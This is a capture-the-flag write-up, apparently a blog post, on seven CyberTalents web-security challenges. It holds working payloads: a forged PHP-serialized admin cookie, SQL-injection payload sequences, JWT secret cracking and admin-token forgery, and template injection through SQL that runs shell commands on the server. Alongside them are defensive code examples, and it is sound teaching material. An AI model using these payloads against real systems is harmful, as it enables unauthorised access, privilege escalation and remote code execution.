CYBERTALENTS SCHOLARSHIP — Web Security CTF

blackninja23
10 min read · Sep 3, 2021

This writeup is written by blackninja23

I truly thank CyberTalents for their scholarship, as it helped me gain knowledge and join a wider community of people from different African and Arab countries. I personally participated in the ethical hacking and web security scholarship tracks, and it was good. Maybe next time I will be in the incident response and digital forensics track, but for now I am more interested in penetration testing.

First challenge in web security CTF

The answer to the first challenge was CSRF.

Second challenge in web security CTF

To solve the challenge, go to http://35.240.62.111/whereisflag/ and look at the page source, either by right-clicking in the browser and choosing View Page Source or by pressing Ctrl+U.

We need to decode the flag, which is VGgzRmxhZzFzSDNyM0JyMA%3D%3D.

Using Burp Suite's Decoder to URL-decode and then base64-decode it, we get the flag: Th3Flag1sH3r3Br0

Third challenge in web security CTF

Go to the URL and it gives us this:

After a while I recognized that I was dealing with headers.

Change Accept-Language: en-US,en;q=0.5 to Accept-Language: de so that the request asks for German.

The flag is FLAG{HE4DERS_M4G1C}

Fourth Challenge in web security CTF

Go to the URL and it gives us this:

I didn't register, which is why it says anonymous. How does the website know? I checked the cookies right away and found this cookie:

Cookie: userCookie=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJOYW1lIjtzOjk6ImFub255bW91cyI7czo3OiJpc0FkbWluIjtiOjA7fQ%3D%3D

Decode it from URL encoding and then from base64 using Burp Suite, and we find something interesting: PHP serialization is being used, so it might be vulnerable to insecure deserialization. After decoding, we have this: O:4:"User":2:{s:8:"userName";s:9:"anonymous";s:7:"isAdmin";b:0;}

Let's understand it.

O means object, 4 means 4 letters in the class name "User", 2 means the object has two attributes, userName and isAdmin; s means string, 8 means 8 letters in "userName"; s means string, 9 means 9 letters in "anonymous"; s means string, 7 means 7 letters in "isAdmin"; b means boolean, and 0 is the boolean value of isAdmin.

So we have two attributes, userName and isAdmin, where the value of userName is anonymous and the value of isAdmin is 0.

So we need to change the values and update the length prefixes of the data to match:

O:4:"User":2:{s:8:"userName";s:5:"admin";s:7:"isAdmin";b:1;}

The value of userName is now admin, which has 5 letters.

The value of isAdmin is now 1.

Encode it to base64 and we have Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJOYW1lIjtzOjU6ImFkbWluIjtzOjc6ImlzQWRtaW4iO2I6MTt9

The flag is FLAG{REALLY!!_IN_COOKIES}
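To see exactly what the cookie carries, and what the server side should have done about it, here is an added Python example (mine, not the challenge's code). A small parser for PHP's serialize() format walks the cookie above into its fields, and a hypothetical sign_session/load_session pair shows how an HMAC over the serialized blob, keyed with a secret that never leaves the server, lets the application reject an edited cookie instead of trusting the isAdmin value it contains. The function names and the key are my assumptions.

```python
import base64
import hashlib
import hmac
import urllib.parse

# Cookie value taken from the challenge above: URL-encoded base64 of a PHP-serialized User object.
ANON_COOKIE = "Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJOYW1lIjtzOjk6ImFub255bW91cyI7czo3OiJpc0FkbWluIjtiOjA7fQ%3D%3D"


class PhpUnserializer:
    """Minimal reader for PHP's serialize() format: s (string), i (int), b (bool), N (null), a (array), O (object)."""

    def __init__(self, data: str):
        self.data = data
        self.pos = 0

    def _read_until(self, stop: str) -> str:
        end = self.data.index(stop, self.pos)
        token = self.data[self.pos:end]
        self.pos = end + 1          # consume the stop character too
        return token

    def _read_quoted(self) -> str:
        # Length-prefixed string <len>:"<bytes>"; the prefix is why the writeup recounts letters after editing.
        length = int(self._read_until(":"))
        value = self.data[self.pos + 1:self.pos + 1 + length]
        self.pos += length + 2      # skip both quotes
        return value

    def _read_members(self) -> dict:
        count = int(self._read_until(":"))
        self.pos += 1               # '{'
        members = {}
        for _ in range(count):
            key = self.parse()
            members[key] = self.parse()
        self.pos += 1               # '}'
        return members

    def parse(self):
        tag = self.data[self.pos]
        self.pos += 2               # the tag and the ':' after it (';' for N)
        if tag == "N":
            return None
        if tag == "s":
            value = self._read_quoted()
            self.pos += 1           # ';'
            return value
        if tag == "i":
            return int(self._read_until(";"))
        if tag == "b":
            return self._read_until(";") == "1"
        if tag == "a":
            return self._read_members()
        if tag == "O":
            name = self._read_quoted()
            self.pos += 1           # ':' before the member count
            return {"__class__": name, **self._read_members()}
        raise ValueError(f"unsupported tag {tag!r} at offset {self.pos - 2}")


def decode_cookie(value: str) -> str:
    """Undo the URL-encoding and base64 layers to reach the raw serialized object."""
    return base64.b64decode(urllib.parse.unquote(value)).decode()


def unserialize_cookie(value: str) -> dict:
    return PhpUnserializer(decode_cookie(value)).parse()


# Hypothetical hardened variant: the server keeps `key` to itself and MACs the blob it hands out.
def sign_session(raw: str, key: bytes) -> str:
    body = base64.urlsafe_b64encode(raw.encode()).decode()
    tag = hmac.new(key, raw.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def load_session(value: str, key: bytes):
    """Return the parsed object only when the MAC matches; None means the cookie was altered or forged."""
    body, _, tag = value.rpartition(".")
    raw = base64.urlsafe_b64decode(body)
    expected = hmac.new(key, raw, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return PhpUnserializer(raw.decode()).parse()


if __name__ == "__main__":
    print(unserialize_cookie(ANON_COOKIE))
```

Run on the cookie above, the parser returns userName anonymous and isAdmin False; a blob re-signed under any other key makes load_session return None. The MAC fixes the trust problem, but a server that still calls unserialize() on the blob should restrict the classes it accepts (PHP's allowed_classes option) or store the session as JSON; better still, keep the role on the server and put only an opaque session id in the cookie.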

Fifth challenge in web security CTF

It deals with a Telegram bot called ctgrocerybot.

Time to open https://web.telegram.org/ and use that bot.

First I tried to understand how it works; from /help we have 3 commands: /help (or /start), /list and /price.

Let's check /list and we have:

Try others like /list banana, but it brings the same result as above.

Let's check /price, but remember the menu says to include <item>.

Let's try /price banana.

You can try others on your own, for example /price flag.

Next step: where do the prices come from? Let us test for SQL injection.

Let us confirm that it is SQL injection with ' or 1=1 -- - and ' or 1=2 -- -

As we can see we get different errors, so let us go hunting for payloads.

Try working with ' or 1=1 -- -

Next step: find the number of columns we are interacting with.

Let us use ' or 1=1 UNION SELECT NULL -- -

then increase the NULLs: ' or 1=1 UNION SELECT NULL,NULL -- -

So we have one column.

Next step: what type of databases are we using?

1. ' UNION SELECT @@version -- -
2. ' or 1=1 UNION SELECT version() -- -
3. ' or 1=1 UNION SELECT sqlite_version() -- -

We have a SQLite database, as that query brings back 25$, but you notice something: it is blind SQL injection.

Next step: confirm that it is a SQLite database with ' or 1=1 UNION SELECT tbl_name FROM sqlite_master -- -

and try a different one: /price ' or 1=1 UNION SELECT tbl_nadwewefme FROM sqlite_master -- -

We really do have a SQLite database.

Next step is to find the table name.

Check for a table named flags with ' or 1=1 UNION SELECT NULL FROM flags LIMIT 1 -- -

and try ' or 1=1 UNION SELECT NULL FROM iamnotflags LIMIT 1 -- -

In a real scenario you would do better to use the substr() function.

Next step is to find the column name.

Check for a column named flag with ' or 1=1 UNION SELECT flag FROM flags LIMIT 1 -- -

CONFIRM: ' or 1=1 UNION SELECT iamnotflag FROM flags LIMIT 1 -- -

Next step is to know the flag:

Try ' or 1=1 UNION select flag from flags WHERE SUBSTR(flag,1,1)='F' -- -, but it failed me, as every letter brought "not found".

So I decided to cause an error to get the flag, using /price ' UNION select flag from flags WHERE SUBSTR(flag,1,1)='F' -- -

Try checking ' UNION select flag from flags WHERE SUBSTR(flag,1,1)='f' -- -

and ' UNION select flag from flags WHERE SUBSTR(flag,1,1)='A' -- -

Up to here we know that F is the first letter.

Second letter:

with /price ' UNION select flag from flags WHERE SUBSTR(flag,2,1)='L' -- -

Now we have the second letter, 'L'.

But you can also use blind SQL injection with a conditional response:

/price ' or 1=1 UNION SELECT CASE WHEN (SUBSTR(flag,1,1)='F') THEN 1/0 ELSE 'a' END FROM flags --

Continue until you get the flag, which is FLAG{sql_1nj3c7i0n_c4n_h4pp3n_t0_b0ts_t0o}

You can also do some scripting, but it is a lot of work. That is why its level is hard.

Sixth challenge in web security CTF

Go to the URL; you get an error that your browser is blocking the port. At first I used the curl command, but now we will use the browser.

To enable port 6000, watch this: https://www.youtube.com/watch?v=h6JChX2D_EE&ab_channel=ecologicaltime

Go to the URL and we see the page:

We have register and login pages, so try to register with username=admin65 and password=admin65.

Let's try to log in and capture some traffic with Burp Suite.

there is Set-Cookie which is Set-Cookie: jwtStore=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluNjUifQ.lL35vj3ExJnMZHJK9nbRT1FqT5Me8ZcarV5tenfH_YY; Path=/

The cookie value of jwtStore is a JWT.

I went to crack the secret. You can use jwt-secret, but personally I use hashcat. The JWT should be saved to a file; the command is hashcat -m 16500 file rockyou.txt. So I had already cracked it.

Alternatively, with jwt-secret: install it with sudo npm install --global jwt-secret, then crack it with jwt-secret --file ./rockyou.txt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluMnEifQ.hqXWfGQwZSxjgbVYCy_ZUxxkCVKl5Eck7RfGRoVXOHQ

Now we have the secret, missbritt1. Go to https://jwt.io/, put the secret into the secret field and edit the payload.

Now we have a new JWT for admin, so let us log in as admin by editing the cookie. The new admin cookie is: Cookie: jwtStore=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.Ze5AKe2aIu2szH31gpPdhlEhY6X3Cnf5xgVMnQqxfcg; Path=/

We have the flag: FLAG{st0p_l00k1n9_at_my_s3cret!!1!!_027f00f}
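The reason hashcat recovers the secret is that HS256 is a MAC and the key was a dictionary word, so every candidate can be checked offline against the captured token. The following added example (mine, not the challenge's code) decodes the captured token's payload the way jwt.io displays it, then implements HS256 issuing and checking with hmac from the standard library: sign_hs256 refuses a key shorter than the 256 bits RFC 7518 requires for HS256, and verify_hs256 accepts only a token whose header says HS256 and whose MAC matches. The function names and the 32-byte demo key are my assumptions.

```python
import base64
import hashlib
import hmac
import json

# RFC 7518 section 3.2: an HS256 key must be at least 256 bits. The cracked
# secret in this writeup ("missbritt1") is 10 bytes and appears in rockyou.txt.
MIN_HS256_KEY_BYTES = 32

# Token captured in the writeup above (Set-Cookie after logging in as admin65).
CAPTURED_TOKEN = ("eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9."
                  "eyJ1c2VybmFtZSI6ImFkbWluNjUifQ."
                  "lL35vj3ExJnMZHJK9nbRT1FqT5Me8ZcarV5tenfH_YY")


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def decode_unverified(token: str) -> dict:
    """Read the payload without checking the MAC: fine for inspection, never for authorization."""
    return json.loads(_b64url_decode(token.split(".")[1]))


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a token; refuse keys short enough for an offline dictionary attack to be realistic."""
    if len(key) < MIN_HS256_KEY_BYTES:
        raise ValueError(f"HS256 key must be at least {MIN_HS256_KEY_BYTES} bytes")
    header = _b64url_encode(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    mac = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(mac)}"


def verify_hs256(token: str, key: bytes):
    """Return the claims only when the header algorithm is HS256 and the MAC matches; otherwise None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(_b64url_decode(header_b64))
        signature = _b64url_decode(sig_b64)
    except ValueError:          # covers bad base64, bad UTF-8 and bad JSON
        return None
    if header.get("alg") != "HS256":
        return None             # only accept the algorithm this server issues
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected):
        return None
    return json.loads(_b64url_decode(payload_b64))


if __name__ == "__main__":
    print(decode_unverified(CAPTURED_TOKEN))
    demo_key = b"constructed-32-byte-key-for-demo"   # constructed for this example
    token = sign_hs256({"username": "admin65"}, demo_key)
    print(verify_hs256(token, demo_key))
```

With the key held server-side and long enough to resist guessing, the edited admin payload from this challenge no longer verifies: swapping the payload, or checking under a different key, makes verify_hs256 return None, and the server should then treat the request as unauthenticated.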

Seventh and last challenge in web security CTF

Go to the link and it gives us this page:

Login and Register just bring up a popup message and do not take us to a page.

We are left with Notes and Admin notes, which are the same thing.

Click Notes and we are taken to:

We have some notes to look at.

Take a look at the first one: we have base64. Decode Q3liZXJUYWxlbnRz from base64 and we have CyberTalents.

After a while of different tests, I came across a SQL injection error.

echo -n "'" | base64 gives Jw==; testing /notes/Jw== we get an error, but we are not sure yet that it is SQL injectable.

Let us determine the number of columns: echo -n "' UNION SELECT NULL-- -" | base64, then test /notes/JyBVTklPTiBTRUxFQ1QgTlVMTC0tIC0=; we get an internal server error, but sometimes NULL throws an internal server error by itself.

Let's continue testing that first column: echo -n "' UNION SELECT 'a'-- -" | base64, then test /notes/JyBVTklPTiBTRUxFQ1QgJ2EnLS0gLQ==; the string a is successfully written to the browser. More: echo -n "' UNION SELECT 'YES, I AM HACKABLE BY SQL INJECTION'-- -" | base64, then test /notes/JyBVTklPTiBTRUxFQ1QgJ1lFUywgSSBBTSBIQUNLQUJMRSBCWSBTUUwgSU5KRUNUSU9OJy0tIC0=

Now that we have SQL injection, find the database version; these cheat sheets will help: https://portswigger.net/web-security/sql-injection/cheat-sheet and https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection . I will try the SQLite version with echo -n "' UNION SELECT sqlite_version()-- -" | base64 -> /notes/JyBVTklPTiBTRUxFQ1Qgc3FsaXRlX3ZlcnNpb24oKS0tIC0=

Now we have the SQLite version, which is 3.34.1.

Enumerate tables:

echo -n "' UNION SELECT tbl_name FROM sqlite_master-- -" | base64 -> /notes/JyBVTklPTiBTRUxFQ1QgdGJsX25hbWUgRlJPTSBzcWxpdGVfbWFzdGVyLS0gLQ==

We have a table called flags. Now go for the columns of flags: echo -n "' UNION SELECT sql FROM sqlite_master-- -" | base64 -> /notes/JyBVTklPTiBTRUxFQ1Qgc3FsIEZST00gc3FsaXRlX21hc3Rlci0tIC0=

We have a column called flag, and the table, as we already know, is flags.

Let us extract some values then: echo -n "' UNION SELECT flag FROM flags-- -" | base64 -> /notes/JyBVTklPTiBTRUxFQ1QgZmxhZyBGUk9NIGZsYWdzLS0gLQ==

We have a flag, but it looks like only the first part. Very funny to get just the first part, which is FLAG{8f94cf148a9f01a3745e
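The two injectable lookups in this writeup, the bot's /price <item> in the fifth challenge and the /notes/<base64> route here, fail for the same reason: the user's text is pasted into the SQL string, so a quote, UNION and a comment become part of the query. The following is an added example, not the challenges' own code: an in-memory SQLite schema I constructed (items, notes and flags tables with a placeholder flag) backs a concatenated lookup for each route beside a parameterized one, so the page's own payloads can be run against both and compared.

```python
import base64
import sqlite3

# Constructed schema for this example; the real challenge databases were not published.
SAMPLE_FLAG = "FLAG{constructed_sample_not_the_real_flag}"


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE items (name TEXT, price TEXT);
        CREATE TABLE notes (title TEXT, body TEXT);
        CREATE TABLE flags (flag TEXT);
        INSERT INTO items VALUES ('banana', '25$'), ('apple', '10$');
        INSERT INTO notes VALUES ('CyberTalents', 'welcome note');
        INSERT INTO flags VALUES ('{SAMPLE_FLAG}');
    """)
    return conn


def _first(row) -> str:
    return row[0] if row else "not found"


# /price <item> the way the bot appears to do it: the item text is concatenated into the query.
def price_vulnerable(conn: sqlite3.Connection, item: str) -> str:
    return _first(conn.execute(f"SELECT price FROM items WHERE name = '{item}'").fetchone())


# Same lookup with a bound parameter: quotes, UNION and comment markers stay plain characters.
def price_fixed(conn: sqlite3.Connection, item: str) -> str:
    return _first(conn.execute("SELECT price FROM items WHERE name = ?", (item,)).fetchone())


# /notes/<base64>: the route decodes the path segment and then (vulnerable form) concatenates it.
def note_vulnerable(conn: sqlite3.Connection, segment: str) -> str:
    title = base64.b64decode(segment).decode()
    return _first(conn.execute(f"SELECT body FROM notes WHERE title = '{title}'").fetchone())


def note_fixed(conn: sqlite3.Connection, segment: str) -> str:
    title = base64.b64decode(segment).decode()
    return _first(conn.execute("SELECT body FROM notes WHERE title = ?", (title,)).fetchone())


if __name__ == "__main__":
    db = build_db()
    payload = "' UNION SELECT flag FROM flags-- -"
    print("concatenated:", price_vulnerable(db, payload))   # the flags row leaks
    print("parameterized:", price_fixed(db, payload))       # not found
    print("bot lookup:", price_fixed(db, "banana"))          # 25$
```

The parameterized versions return "not found" for every payload on this page and the right row for real input, which is the whole fix: the decoded path segment or chat argument goes to the driver as a value, and the SQL text never changes. Error messages should also stay generic, since the bot's and the notes page's differing errors were what made the blind and error-based steps above possible.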

After some time, I realised this is a Flask template, so why not try Server Side Template Injection (SSTI)?

Try with echo -n "{{7*7}}" | base64, but no luck.

Here an idea came: how about SSTI through SQL? I know it sounds crazy too. If the value is accepted, it is reflected from the database into the template.

Let us begin with echo -n "' UNION SELECT '{{7*7}}'-- -" | base64 -> /notes/JyBVTklPTiBTRUxFQ1QgJ3t7Nyo3fX0nLS0gLQ== and see whether it multiplies 7*7 to 49.

Then we have SSTI; continue to command injection.

Try executing ls:

echo -n "' UNION SELECT '{{config.__class__.__init__.__globals__[\"os\"].popen(\"ls\").read()}}'-- -" | base64 -> /notes/JyBVTklPTiBTRUxFQ1QgJ3t7Y29uZmlnLl9fY2xhc3NfXy5fX2luaXRfXy5fX2dsb2JhbHNfX1sib3MiXS5wb3BlbigibHMiKS5yZWFkKCl9fSctLSAt

We need to cat flag2.txt:

echo -n "' UNION SELECT '{{config.__class__.__init__.__globals__[\"os\"].popen(\"cat flag2.txt\").read()}}'-- -" | base64 -> /notes/JyBVTklPTiBTRUxFQ1QgJ3t7Y29uZmlnLl9fY2xhc3NfXy5fX2luaXRfXy5fX2dsb2JhbHNfX1sib3MiXS5wb3BlbigiY2F0IGZsYWcyLnR4dCIpLnJlYWQoKX19Jy0tIC0=

We have the second part of the flag, which is 12f1fc6f8e419dc0fb08}

So the flag is FLAG{8f94cf148a9f01a3745e12f1fc6f8e419dc0fb08}

I finished those six challenges.

blackninja23
